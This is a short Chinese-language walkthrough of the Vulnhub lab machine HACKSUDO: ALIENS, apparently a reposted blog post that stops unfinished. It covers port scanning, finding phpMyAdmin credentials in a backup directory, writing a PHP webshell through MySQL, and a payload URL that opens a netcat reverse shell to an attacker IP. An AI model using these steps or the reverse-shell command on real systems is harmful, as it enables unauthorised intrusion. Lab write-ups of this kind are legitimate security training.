其他分享
首页 > 其他分享> > Vulnhub_HACKSUDO: ALIENS

Vulnhub_HACKSUDO: ALIENS

作者:互联网

Vulnhub下载地址https://www.vulnhub.com/entry/hacksudo-aliens,676/
0x01环境介绍

靶机ip:10.10.13.50

0x02信息收集

利用nmap进行端口漏洞的扫描,发现开放22、80、9000端口
既然有80端口,那下一步就是对80端口上的web页面进行扫描

利用dirmap扫描,发现一个页面

http://10.10.13.50/backup/


页面内容点击下载后,发现几个敏感数据

刚刚扫描出来的还有9000端口,访问了一下是phpmyadmin页面,将刚获得的敏感数据输入后,发现成功登陆

vishal/hacksudo

0x03漏洞检测

发现secure_file_priv为空值即可读可写

利用mysql写入一句话木马
image
0x04漏洞利用

payload:http://10.10.13.50/alien.php?cmd=nc%2010.10.13.253%20%208989%20%20-e%20/bin/bash

将/bin/bash转发到10.10.13.253的8989端口上

未完,待续……

标签:HACKSUDO,扫描,ALIENS,端口,13.50,Vulnhub,10.10,80,页面
来源: https://www.cnblogs.com/secutity-zbk/p/14854452.html